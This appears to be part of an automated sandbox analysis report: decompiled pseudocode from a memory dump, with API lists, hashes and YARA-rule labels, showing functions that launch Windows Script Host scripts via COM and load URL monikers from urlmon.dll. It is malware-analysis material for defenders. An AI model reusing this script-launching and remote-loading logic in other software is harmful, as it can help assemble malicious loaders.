				_t15 =  *0xb97004; // 0xbb40e64e
				_v8 = _t15 ^ _t36;
				_t35 = _a4;
				_v928 = _t35;
				_t39 =  *0xb97001; // 0x0
				if(_t39 == 0) {
					_t35 = WideCharToMultiByte;
					_t34 = WideCharToMultiByte(0, 0, WideCharToMultiByte, 0xffffffff, 0, 0, 0, 0);
					if(_t34 != 0) {
						E00B8320B(_t17);
						_v924 = _t37;
						if(WideCharToMultiByte(0, 0, _v928, 0xffffffff, _v924, _t34, 0, 0) == 0) {
							goto L5;
						}
						_t23 = GetFileAttributesA(_v924);
						if(_t23 != 0xffffffff) {
							L15:
							if((_t23 & 0x00000010) == 0) {
								L14:
								_t20 = 0;
								L17:
								return E00B81335(_t20, 0, _v8 ^ _t36, _t33, _t34, _t35);
							}
							L16:
							_t20 = 0x80070002;
							goto L17;
						}
						if(GetLastError() != 0x20) {
							goto L16;
						}
						_t26 = FindFirstFileA(_v924,  &_v328);
						L11:
						if(_t26 == 0 || _t26 == 0xffffffff) {
							goto L16;
						} else {
							FindClose(_t26);
							goto L14;
						}
					}
					L5:
					_t20 = GetLastError();
					if(_t20 > 0) {
						_t20 = _t20 & 0x0000ffff | 0x80070000;
					}
					goto L17;
				}
				_t23 = GetFileAttributesW(_t35);
				if(_t23 != 0xffffffff) {
					goto L15;
				}
				if(GetLastError() != 0x20) {
					goto L16;
				}
				_t26 = FindFirstFileW(_t35,  &_v920);
				goto L11;
			}





















                                                        0x00b8f0d3
                                                        0x00b8f0de
                                                        0x00b8f0e5
                                                        0x00b8f0ea
                                                        0x00b8f0f0
                                                        0x00b8f0f6
                                                        0x00b8f0fc
                                                        0x00b8f137
                                                        0x00b8f141
                                                        0x00b8f145
                                                        0x00b8f15d
                                                        0x00b8f162
                                                        0x00b8f17f
                                                        0x00000000
                                                        0x00000000
                                                        0x00b8f187
                                                        0x00b8f190
                                                        0x00b8f1c4
                                                        0x00b8f1c6
                                                        0x00b8f1c0
                                                        0x00b8f1c0
                                                        0x00b8f1cd
                                                        0x00b8f1e1
                                                        0x00b8f1e1
                                                        0x00b8f1c8
                                                        0x00b8f1c8
                                                        0x00000000
                                                        0x00b8f1c8
                                                        0x00b8f19b
                                                        0x00000000
                                                        0x00000000
                                                        0x00b8f1aa
                                                        0x00b8f1b0
                                                        0x00b8f1b2
                                                        0x00000000
                                                        0x00b8f1b9
                                                        0x00b8f1ba
                                                        0x00000000
                                                        0x00b8f1ba
                                                        0x00b8f1b2
                                                        0x00b8f147
                                                        0x00b8f147
                                                        0x00b8f14f
                                                        0x00b8f156
                                                        0x00b8f156
                                                        0x00000000
                                                        0x00b8f14f
                                                        0x00b8f0ff
                                                        0x00b8f108
                                                        0x00000000
                                                        0x00000000
                                                        0x00b8f117
                                                        0x00000000
                                                        0x00000000
                                                        0x00b8f125
                                                        0x00000000

                                                        APIs
                                                        • GetFileAttributesW.KERNEL32(?,00000104,?,00000000), ref: 00B8F0FF
                                                        • GetLastError.KERNEL32 ref: 00B8F10E
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00B8F125
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000104,?,00000000), ref: 00B8F13F
                                                        • GetLastError.KERNEL32 ref: 00B8F147
                                                        • FindClose.KERNEL32(00000000), ref: 00B8F1BA
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ErrorFileFindLast$AttributesByteCharCloseFirstMultiWide
                                                        • String ID:
                                                        • API String ID: 443336949-0
                                                        • Opcode ID: 25d47cd05b2a74338198b177857858e2f50a7b7564a0ab0f1342915b7200a749
                                                        • Instruction ID: 50daa0203b09e1d9a557f65ed83acedc131903cb451058f01f8b7f2f6b69bd57
                                                        • Opcode Fuzzy Hash: 25d47cd05b2a74338198b177857858e2f50a7b7564a0ab0f1342915b7200a749
                                                        • Instruction Fuzzy Hash: DE21677190111AEFDB217B69DC889BD76EDDB46774F600AE6F115E20B0CA348E85CB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B866C1, Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 311comCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 72%
                                                        			E00B866C1(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				intOrPtr* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				char* _v44;
				char* _v48;
				char* _v52;
				char _v56;
				int _v64;
				char _v72;
				intOrPtr* _t84;
				short _t87;
				int _t88;
				intOrPtr* _t89;
				intOrPtr* _t91;
				intOrPtr* _t92;
				intOrPtr* _t93;
				intOrPtr* _t94;
				intOrPtr* _t95;
				intOrPtr* _t96;
				intOrPtr* _t97;
				intOrPtr* _t98;
				intOrPtr* _t116;
				char* _t118;
				intOrPtr* _t119;
				intOrPtr _t121;
				intOrPtr* _t122;
				intOrPtr* _t124;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t130;
				char* _t132;
				intOrPtr* _t133;
				intOrPtr* _t135;
				char* _t137;
				char* _t139;
				intOrPtr* _t140;
				intOrPtr _t142;
				intOrPtr _t162;
				signed int _t176;
				intOrPtr* _t181;
				intOrPtr* _t182;
				intOrPtr* _t183;
				char* _t184;

				_t181 = __ecx + 0x25c;
				_t84 =  *_t181;
				_v12 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v28 = 0;
				_v36 = 0;
				_v40 = 0;
				_v32 = 0;
				_v24 = 0;
				_v16 = 0;
				if(_t84 != 0) {
					 *((intOrPtr*)( *_t84 + 8))(_t84);
					 *_t181 = 0;
				}
				_t183 = __imp__CoCreateInstance;
				_push(_t181);
				_push(0xb869f0);
				_push(1);
				_push(0);
				_push(0xb869d0);
				if( *_t183() >= 0) {
					L3:
					_t87 = 3;
					_v72 = _t87;
					_t88 = GetUserDefaultLCID();
					_v64 = _t88;
					_t89 =  *_t181;
					_t184 =  *((intOrPtr*)( *_t89 + 0x1c))(_t89, 1, 0,  &_v72);
					if(_t184 >= 0) {
						_t184 = E00B86D41( &_v28,  *_t181,  &_v28);
						if(_t184 >= 0) {
							_t184 = E00B86EDC( &_v32, _v12,  *_t181,  &_v32);
							if(_t184 >= 0) {
								_t116 =  *_t181;
								_t184 =  *((intOrPtr*)( *_t116 + 0xc))(_t116, _v32);
								if(_t184 >= 0) {
									_t118 =  &_v36;
									__imp__CoGetClassObject(0xb869e0, 1, 0, 0xb86a20, _t118);
									_t184 = _t118;
									if(_t184 >= 0) {
										_t119 = _v36;
										_t184 =  *((intOrPtr*)( *_t119 + 0x14))(_t119, _v28, 0, 0xb86a00,  &_v8);
										if(_t184 >= 0) {
											_t121 = _v12;
											_t176 = 2;
											if( *((intOrPtr*)(_t121 + 0x23)) != 0) {
												_t176 = 0x22;
											}
											_t162 =  *((intOrPtr*)(_t121 + 0x28));
											if(_t162 != 0) {
												_t176 = _t176 | 0x00000040;
											}
											if(_t162 == 1) {
												if( *((intOrPtr*)(_t121 + 0x20)) != 0) {
													goto L12;
												} else {
													goto L13;
												}
												L60:
											} else {
												L12:
												_t176 = _t176 | 0x00000080;
											}
											L13:
											if( *((intOrPtr*)(_t121 + 0x26)) != 0) {
												_t176 = _t176 | 0x00000100;
											}
											if( *((intOrPtr*)(_t121 + 0x27)) != 0) {
												_t176 = _t176 | 0x00000200;
											}
											_t122 = _v8;
											_t184 =  *((intOrPtr*)( *_t122 + 0xc))(_t122, _t176);
											if(_t184 >= 0) {
												_t124 = _v8;
												_t184 =  *((intOrPtr*)( *_t124))(_t124, 0xb86a10,  &_v20);
												if(_t184 >= 0) {
													_t126 = _v20;
													_t184 =  *((intOrPtr*)( *_t126 + 0xc))(_t126, L"WScript", 2);
													if(_t184 >= 0) {
														_t128 = _v20;
														_t184 =  *((intOrPtr*)( *_t128 + 0xc))(_t128, L"WSH", 2);
														if(_t184 >= 0) {
															_t130 = _v8;
															_t184 =  *((intOrPtr*)( *_t130))(_t130, 0xb86a30,  &_v24);
															if(_t184 >= 0) {
																_t132 =  &_v16;
																__imp__CreateBindCtx(0, _t132);
																_t184 = _t132;
																if(_t184 >= 0) {
																	_t133 = _v16;
																	_v56 = 0x10;
																	_v52 = 0;
																	_v48 = 0;
																	_v44 = 0;
																	_t184 =  *((intOrPtr*)( *_t133 + 0x18))(_t133,  &_v56);
																	if(_t184 >= 0) {
																		_t135 = _v24;
																		_t184 =  *((intOrPtr*)( *_t135 + 0x14))(_t135, 1, _a4, _v16, 0);
																		if(_t184 < 0) {
																			if(_t184 != 0x80020101) {
																				_t137 = E00B8F362(_v12, 0x80070002);
																				goto L58;
																			}
																		} else {
																			_t138 = _v12;
																			if( *((intOrPtr*)(_v12 + 0x21)) != 0) {
																				_t139 = E00B8FC44( *((intOrPtr*)(_t138 + 0x24c)),  *((intOrPtr*)(_t138 + 8)));
																				_t184 = _t139;
																				if(_t184 >= 0) {
																					goto L25;
																				}
																			} else {
																				L25:
																				_t140 = _v8;
																				_t184 =  *((intOrPtr*)( *_t140 + 0x10))(_t140, _a8,  *_t181, 0, 0xb815b8,  &_v40);
																				if(_t184 < 0) {
																					if(_t184 == 0x80070057) {
																						_t142 =  *0xb9702c; // 0x0
																						_t137 = E00B8F321(_v12, _t142 + 0x15, 0xcf7, _a8);
																						L58:
																						_t184 = _t137;
																					}
																				} else {
																					_t184 = 0;
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				} else {
					_t184 =  *_t183(0xb869c0, 0, 1, 0xb869f0, _t181);
					if(_t184 >= 0) {
						goto L3;
					}
				}
				_t91 = _v16;
				if(_t91 != 0) {
					 *((intOrPtr*)( *_t91 + 8))(_t91);
				}
				_t92 = _v24;
				if(_t92 != 0) {
					 *((intOrPtr*)( *_t92 + 8))(_t92);
				}
				_t93 = _v40;
				if(_t93 != 0) {
					 *((intOrPtr*)( *_t93 + 8))(_t93);
				}
				_t94 = _v8;
				if(_t94 != 0) {
					 *((intOrPtr*)( *_t94 + 8))(_t94);
				}
				_t95 = _v20;
				if(_t95 != 0) {
					 *((intOrPtr*)( *_t95 + 8))(_t95);
				}
				_t96 = _v28;
				if(_t96 != 0) {
					 *((intOrPtr*)( *_t96 + 8))(_t96);
				}
				_t97 = _v32;
				if(_t97 != 0) {
					 *((intOrPtr*)( *_t97 + 8))(_t97);
				}
				_t98 = _v36;
				if(_t98 != 0) {
					 *((intOrPtr*)( *_t98 + 8))(_t98);
				}
				_t182 = _v12;
				E00B85FA1( *((intOrPtr*)(_t182 + 0x24c)));
				if(E00B85BBF(_t182) != 0) {
					 *((intOrPtr*)( *_t182 + 0x20))();
				}
				return _t184;
				goto L60;
			}




















































                                                        0x00b866ce
                                                        0x00b866d4
                                                        0x00b866d6
                                                        0x00b866d9
                                                        0x00b866dc
                                                        0x00b866df
                                                        0x00b866e2
                                                        0x00b866e5
                                                        0x00b866e8
                                                        0x00b866eb
                                                        0x00b866ee
                                                        0x00b866f3
                                                        0x00b890dc
                                                        0x00b890df
                                                        0x00b890df
                                                        0x00b866f9
                                                        0x00b866ff
                                                        0x00b86700
                                                        0x00b86705
                                                        0x00b86707
                                                        0x00b86708
                                                        0x00b86711
                                                        0x00b8672d
                                                        0x00b8672f
                                                        0x00b86730
                                                        0x00b86734
                                                        0x00b8673f
                                                        0x00b86742
                                                        0x00b8674c
                                                        0x00b86750
                                                        0x00b86761
                                                        0x00b86765
                                                        0x00b86779
                                                        0x00b8677d
                                                        0x00b86783
                                                        0x00b8678e
                                                        0x00b86792
                                                        0x00b86798
                                                        0x00b867a9
                                                        0x00b867af
                                                        0x00b867b3
                                                        0x00b867b9
                                                        0x00b867cf
                                                        0x00b867d3
                                                        0x00b867d9
                                                        0x00b867de
                                                        0x00b867e2
                                                        0x00b890e8
                                                        0x00b890e8
                                                        0x00b867e8
                                                        0x00b867ed
                                                        0x00b890ee
                                                        0x00b890ee
                                                        0x00b867f6
                                                        0x00b869a5
                                                        0x00000000
                                                        0x00b869ab
                                                        0x00000000
                                                        0x00b869ab
                                                        0x00000000
                                                        0x00b867fc
                                                        0x00b867fc
                                                        0x00b867fc
                                                        0x00b867fc
                                                        0x00b86802
                                                        0x00b86805
                                                        0x00b86807
                                                        0x00b86807
                                                        0x00b86810
                                                        0x00b890f6
                                                        0x00b890f6
                                                        0x00b86816
                                                        0x00b86820
                                                        0x00b86824
                                                        0x00b8682a
                                                        0x00b8683b
                                                        0x00b8683f
                                                        0x00b86845
                                                        0x00b86855
                                                        0x00b86859
                                                        0x00b8685f
                                                        0x00b8686f
                                                        0x00b86873
                                                        0x00b86879
                                                        0x00b8688a
                                                        0x00b8688e
                                                        0x00b86894
                                                        0x00b86899
                                                        0x00b8689f
                                                        0x00b868a3
                                                        0x00b868a5
                                                        0x00b868ac
                                                        0x00b868b3
                                                        0x00b868b6
                                                        0x00b868b9
                                                        0x00b868c2
                                                        0x00b868c6
                                                        0x00b868c8
                                                        0x00b868da
                                                        0x00b868de
                                                        0x00b89107
                                                        0x00b89115
                                                        0x00000000
                                                        0x00b89115
                                                        0x00b868e4
                                                        0x00b868e4
                                                        0x00b868ea
                                                        0x00b89125
                                                        0x00b869b0
                                                        0x00b869b4
                                                        0x00000000
                                                        0x00b869ba
                                                        0x00b868f0
                                                        0x00b868f0
                                                        0x00b868f0
                                                        0x00b86908
                                                        0x00b8690c
                                                        0x00b89135
                                                        0x00b8913e
                                                        0x00b8914f
                                                        0x00b89154
                                                        0x00b89154
                                                        0x00b89154
                                                        0x00b86912
                                                        0x00b86912
                                                        0x00b86912
                                                        0x00b8690c
                                                        0x00b868ea
                                                        0x00b868de
                                                        0x00b868c6
                                                        0x00b868a3
                                                        0x00b8688e
                                                        0x00b86873
                                                        0x00b86859
                                                        0x00b8683f
                                                        0x00b86824
                                                        0x00b867d3
                                                        0x00b867b3
                                                        0x00b86792
                                                        0x00b8677d
                                                        0x00b86765
                                                        0x00b86713
                                                        0x00b86723
                                                        0x00b86727
                                                        0x00000000
                                                        0x00000000
                                                        0x00b86727
                                                        0x00b86914
                                                        0x00b86919
                                                        0x00b8691e
                                                        0x00b8691e
                                                        0x00b86921
                                                        0x00b86926
                                                        0x00b8692b
                                                        0x00b8692b
                                                        0x00b8692e
                                                        0x00b86933
                                                        0x00b86938
                                                        0x00b86938
                                                        0x00b8693b
                                                        0x00b86940
                                                        0x00b86945
                                                        0x00b86945
                                                        0x00b86948
                                                        0x00b8694d
                                                        0x00b86952
                                                        0x00b86952
                                                        0x00b86955
                                                        0x00b8695a
                                                        0x00b8695f
                                                        0x00b8695f
                                                        0x00b86962
                                                        0x00b86967
                                                        0x00b8696c
                                                        0x00b8696c
                                                        0x00b8696f
                                                        0x00b86974
                                                        0x00b86979
                                                        0x00b86979
                                                        0x00b8697c
                                                        0x00b86985
                                                        0x00b86993
                                                        0x00b8915f
                                                        0x00b8915f
                                                        0x00b8699f
                                                        0x00000000

                                                        APIs
                                                        • CoCreateInstance.OLE32(00B869D0,00000000,00000001,00B869F0,00B86E16), ref: 00B8670D
                                                        • CoCreateInstance.OLE32(00B869C0,00000000,00000001,00B869F0,00B86E16), ref: 00B86721
                                                        • GetUserDefaultLCID.KERNEL32(?,?,?,?,00B86E16,00000000,?,00000000,?,00000000,00000000,.wsf,000000FF,?,0000002E,?), ref: 00B86734
                                                        • CoGetClassObject.OLE32(00B869E0,00000001,00000000,00B86A20,?), ref: 00B867A9
                                                        • CreateBindCtx.OLE32(00000000,?), ref: 00B86899
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: Create$Instance$BindClassDefaultObjectUser
                                                        • String ID: WSH$WScript
                                                        • API String ID: 1420412123-1019903269
                                                        • Opcode ID: 6bc9bdfe75c48a84aa3a572da9332db39876910344849df3bde5e56f257ac7fd
                                                        • Instruction ID: 870e6a198bb47e9768d15f5da59e5070c9e43c86ba27b7683cad86451d08f014
                                                        • Opcode Fuzzy Hash: 6bc9bdfe75c48a84aa3a572da9332db39876910344849df3bde5e56f257ac7fd
                                                        • Instruction Fuzzy Hash: DCB14C75A00215EFCB10EFA4C8C8DADB7F9EB4C704B2545E9E946EB2A0D7369D41CB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B86E5C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34libraryloaderCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 68%
                                                        			E00B86E5C(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				_Unknown_base(*)()* _t4;
				struct HINSTANCE__* _t6;
				signed int _t7;

				_t4 =  *0xb9700c; // 0x0
				if(_t4 != 0) {
					L4:
					return  *_t4(_a4, _a8, _a12, 1);
				}
				_t6 =  *0xb97024; // 0x0
				if(_t6 != 0) {
					L3:
					_t4 = GetProcAddress(_t6, "CreateURLMonikerEx");
					 *0xb9700c = _t4;
					if(_t4 != 0) {
						goto L4;
					}
				} else {
					_t6 = LoadLibraryA("urlmon.dll");
					 *0xb97024 = _t6;
					if(_t6 != 0) {
						goto L3;
					}
				}
				 *0xb974a4 = 1;
				_t7 = GetLastError();
				if(_t7 > 0) {
					return _t7 & 0x0000ffff | 0x80070000;
				}
				return _t7;
			}






                                                        0x00b86e61
                                                        0x00b86e68
                                                        0x00b86ea4
                                                        0x00000000
                                                        0x00b86eaf
                                                        0x00b86e6a
                                                        0x00b86e71
                                                        0x00b86e8b
                                                        0x00b86e91
                                                        0x00b86e97
                                                        0x00b86e9e
                                                        0x00000000
                                                        0x00000000
                                                        0x00b86e73
                                                        0x00b86e78
                                                        0x00b86e7e
                                                        0x00b86e85
                                                        0x00000000
                                                        0x00000000
                                                        0x00b86e85
                                                        0x00b87e52
                                                        0x00b87e59
                                                        0x00b87e61
                                                        0x00000000
                                                        0x00b87e6c
                                                        0x00b86eb2

                                                        APIs
                                                        • LoadLibraryA.KERNEL32(urlmon.dll), ref: 00B86E78
                                                        • GetProcAddress.KERNEL32(00000000,CreateURLMonikerEx,?,00B86E4B,?,?,?,?,00B86DF9,00000000,?,00000000,00000000,.wsf,000000FF,?), ref: 00B86E91
                                                        • GetLastError.KERNEL32(?,00B86E4B,?,?,?,?,00B86DF9,00000000,?,00000000,00000000,.wsf,000000FF,?,0000002E,?), ref: 00B87E59
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: AddressErrorLastLibraryLoadProc
                                                        • String ID: CreateURLMonikerEx$urlmon.dll
                                                        • API String ID: 3511525774-3151727589
                                                        • Opcode ID: b042a76a75554185795a344c93309a790aa2efb955167a0df969004838ba91e3
                                                        • Instruction ID: c648c9e4fac47a4a18c1d3df5b61dd34db38089fedf7303a962dee4387ae7897
                                                        • Opcode Fuzzy Hash: b042a76a75554185795a344c93309a790aa2efb955167a0df969004838ba91e3
                                                        • Instruction Fuzzy Hash: 7FF06D396943069ADB11AF69DD04B663BDCFB14752B1040A5F900D7270EE75C840CB10
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B82FA1, Relevance: 7.6, APIs: 5, Instructions: 50timethreadCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00B82FA1() {
				struct _FILETIME _v12;
				signed int _v16;
				union _LARGE_INTEGER _v20;
				signed int _t14;
				signed int _t16;
				signed int _t17;
				signed int _t18;
				signed int _t22;
				signed int _t23;
				signed int _t32;

				_t14 =  *0xb97004; // 0xbb40e64e
				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
				_v12.dwHighDateTime = _v12.dwHighDateTime & 0x00000000;
				if(_t14 != 0xbb40e64e) {
					if((0xffff0000 & _t14) == 0) {
						goto L1;
					}
					_t23 =  !_t14;
					 *0xb97008 = _t23;
					return _t23;
				}
				L1:
				GetSystemTimeAsFileTime( &_v12);
				_t16 = GetCurrentProcessId();
				_t17 = GetCurrentThreadId();
				_t18 = GetTickCount();
				QueryPerformanceCounter( &_v20);
				_t22 = _v16 ^ _v20.LowPart;
				_t32 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t16 ^ _t17 ^ _t18 ^ _t22;
				if(_t32 == 0xbb40e64e || ( *0xb97004 & 0xffff0000) == 0) {
					_t32 = 0xbb40e64f;
				}
				 *0xb97004 = _t32;
				 *0xb97008 =  !_t32;
				return _t22;
			}













                                                        0x00b82fa9
                                                        0x00b82fae
                                                        0x00b82fb2
                                                        0x00b82fc4
                                                        0x00b87800
                                                        0x00000000
                                                        0x00000000
                                                        0x00b87806
                                                        0x00b87808
                                                        0x00000000
                                                        0x00b87808
                                                        0x00b82fca
                                                        0x00b82fcf
                                                        0x00b82fdb
                                                        0x00b82fe3
                                                        0x00b82feb
                                                        0x00b82ff7
                                                        0x00b83000
                                                        0x00b83003
                                                        0x00b83007
                                                        0x00b83024
                                                        0x00b83024
                                                        0x00b83011
                                                        0x00b83019
                                                        0x00000000

                                                        APIs
                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00B82FCF
                                                        • GetCurrentProcessId.KERNEL32 ref: 00B82FDB
                                                        • GetCurrentThreadId.KERNEL32 ref: 00B82FE3
                                                        • GetTickCount.KERNEL32 ref: 00B82FEB
                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00B82FF7
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                        • String ID:
                                                        • API String ID: 1445889803-0
                                                        • Opcode ID: fddaf0bac5ca42cc85dbc3e3b77f42a56d56d83d176d9ea851804e56b6ffb8a8
                                                        • Instruction ID: 20f251ad3474310629f2cdf93b4c006784054260d9aee6dfe68d6e9445f0bb04
                                                        • Opcode Fuzzy Hash: fddaf0bac5ca42cc85dbc3e3b77f42a56d56d83d176d9ea851804e56b6ffb8a8
                                                        • Instruction Fuzzy Hash: 2E116572D012159BCB11ABF8DA8C6AAB7F8FB49755F550892E601F7220DE309D41C780
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B81335, Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 92%
                                                        			E00B81335(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr* _t26;
				void* _t29;

				_t29 = __ecx -  *0xb97004; // 0xbb40e64e
				if(_t29 != 0) {
					 *0xb971d0 = __eax;
					 *0xb971cc = __ecx;
					 *0xb971c8 = __edx;
					 *0xb971c4 = __ebx;
					 *0xb971c0 = __esi;
					 *0xb971bc = __edi;
					 *0xb971e8 = ss;
					 *0xb971dc = cs;
					 *0xb971b8 = ds;
					 *0xb971b4 = es;
					 *0xb971b0 = fs;
					 *0xb971ac = gs;
					asm("pushfd");
					_pop( *0xb971e0);
					 *0xb971d4 =  *_t26;
					 *0xb971d8 = _v0;
					 *0xb971e4 =  &_a4;
					 *0xb97120 = 0x10001;
					_t11 =  *0xb971d8; // 0x0
					 *0xb970dc = _t11;
					 *0xb970d0 = 0xc0000409;
					 *0xb970d4 = 1;
					_t12 =  *0xb97004; // 0xbb40e64e
					_v812 = _t12;
					_t13 =  *0xb97008; // 0x44bf19b1
					_v808 = _t13;
					SetUnhandledExceptionFilter(0);
					UnhandledExceptionFilter(0xb8d188);
					return TerminateProcess(GetCurrentProcess(), 0xc0000409);
				} else {
					return __eax;
				}
			}












                                                        0x00b81335
                                                        0x00b8133b
                                                        0x00b8d0b5
                                                        0x00b8d0ba
                                                        0x00b8d0c0
                                                        0x00b8d0c6
                                                        0x00b8d0cc
                                                        0x00b8d0d2
                                                        0x00b8d0d8
                                                        0x00b8d0de
                                                        0x00b8d0e4
                                                        0x00b8d0ea
                                                        0x00b8d0f0
                                                        0x00b8d0f6
                                                        0x00b8d0fc
                                                        0x00b8d0fd
                                                        0x00b8d106
                                                        0x00b8d10e
                                                        0x00b8d116
                                                        0x00b8d121
                                                        0x00b8d12b
                                                        0x00b8d130
                                                        0x00b8d135
                                                        0x00b8d13f
                                                        0x00b8d149
                                                        0x00b8d14e
                                                        0x00b8d154
                                                        0x00b8d159
                                                        0x00b8d161
                                                        0x00b8d16c
                                                        0x00b8d185
                                                        0x00b81341
                                                        0x00b81341
                                                        0x00b81341

                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32 ref: 00B8D161
                                                        • UnhandledExceptionFilter.KERNEL32(00B8D188), ref: 00B8D16C
                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 00B8D177
                                                        • TerminateProcess.KERNEL32(00000000), ref: 00B8D17E
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                        • String ID:
                                                        • API String ID: 3231755760-0
                                                        • Opcode ID: 6f24ee5d99d59a38bdb829e405d1239fafb52d73d5dc4c4f13e36c30aabeeb2a
                                                        • Instruction ID: 210d9d43d784e9b9f03ae3521fa810ccb4c5548f3fb741e9094f4756843f3a4d
                                                        • Opcode Fuzzy Hash: 6f24ee5d99d59a38bdb829e405d1239fafb52d73d5dc4c4f13e36c30aabeeb2a
                                                        • Instruction Fuzzy Hash: 61217EB49A93249FC741DF69EE49A447BE4FB09710B50449BE908A7370EF705981CF29
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B91AA2, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 226COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 69%
                                                        			E00B91AA2(intOrPtr __edi, intOrPtr* _a8, intOrPtr* _a12, char* _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v528;
				char _v544;
				void* _v548;
				void* _v552;
				void* _v556;
				intOrPtr* _v560;
				intOrPtr* _v564;
				char _v568;
				char _v572;
				void* __ebx;
				void* __esi;
				signed int _t58;
				intOrPtr* _t60;
				char* _t61;
				void* _t62;
				char* _t68;
				intOrPtr* _t69;
				intOrPtr* _t70;
				intOrPtr* _t77;
				intOrPtr* _t78;
				intOrPtr* _t90;
				intOrPtr* _t92;
				intOrPtr* _t94;
				intOrPtr* _t96;
				intOrPtr* _t98;
				intOrPtr* _t101;
				intOrPtr _t120;
				char* _t121;
				intOrPtr* _t123;
				intOrPtr _t124;
				signed int _t125;

				_t120 = __edi;
				_t58 =  *0xb97004; // 0xbb40e64e
				_v8 = _t58 ^ _t125;
				_t101 = _a20;
				_t119 = _a16;
				_t60 = _a12;
				_t123 = _a8;
				_v560 = _t119;
				_v564 = _t101;
				if(_t101 != 0) {
					if(_t123 != 0 &&  *_t123 == 0) {
						_t123 = 0;
					}
					if(_t119 != 0 &&  *_t119 == 0) {
						_v560 = 0;
					}
					_push(_t120);
					if(_t60 == 0) {
						L19:
						if(_t123 != 0) {
							_t61 =  &_v548;
							_v548 = 0;
							__imp__CreateBindCtx(0, _t61);
							_t121 = _t61;
							if(_t121 >= 0) {
								_v552 = 0;
								_t62 = E00B93559(_t123, 0x3a);
								if(_t62 == 0 || (_t62 - _t123 & 0xfffffffe) == 2) {
									_t124 = E00B83B1E(_t119, _t123, 0x104,  &_v528,  &_v568);
									if(_t124 >= 0) {
										_t68 =  &_v528;
										__imp__MkParseDisplayName(_v548, _t68,  &_v572,  &_v552);
										goto L31;
									}
									_t69 = _v552;
									goto L35;
								} else {
									_t68 = E00B86E2B(0, _t123,  &_v552);
									L31:
									_t124 = _t68;
									_t69 = _v552;
									if(_t124 < 0) {
										L35:
										if(_t69 != 0) {
											 *((intOrPtr*)( *_t69 + 8))(_t69);
										}
										_t70 = _v548;
										if(_t70 == 0) {
											goto L44;
										} else {
											goto L38;
										}
									}
									_t119 =  &_v556;
									_t124 =  *((intOrPtr*)( *_t69 + 0x20))(_t69, _v548, 0, 0xb81638,  &_v556);
									if(_t124 == 0x800c0005) {
										_t124 = 0x800401ea;
									}
									_t69 = _v552;
									if(_t124 >= 0) {
										_t119 =  &_v544;
										_t124 =  *((intOrPtr*)( *_t69 + 0xc))(_t69,  &_v544);
										_t77 = _v552;
										if(_t77 != 0) {
											 *((intOrPtr*)( *_t77 + 8))(_t77);
										}
										_t78 = _v548;
										if(_t78 == 0) {
											goto L43;
										} else {
											goto L42;
										}
									} else {
										goto L35;
									}
								}
							}
							_t90 = _v548;
							if(_t90 == 0) {
								goto L24;
							}
							goto L23;
						}
						_t71 = 0x80070057;
						goto L49;
					} else {
						if( *_t60 == 0) {
							_t60 = 0;
						}
						if(_t60 == 0) {
							goto L19;
						} else {
							if(E00B82B81(_t60, _t119, _t60,  &_v544,  &_v548) < 0) {
								L49:
								_pop(_t120);
								L50:
								return E00B81335(_t71, 0, _v8 ^ _t125, _t119, _t120, _t124);
							}
							if(_t123 == 0) {
								L18:
								_t92 = _v548;
								_t119 =  &_v556;
								_t124 =  *((intOrPtr*)( *_t92))(_t92, 0xb81638,  &_v556);
								_t78 = _v548;
								L42:
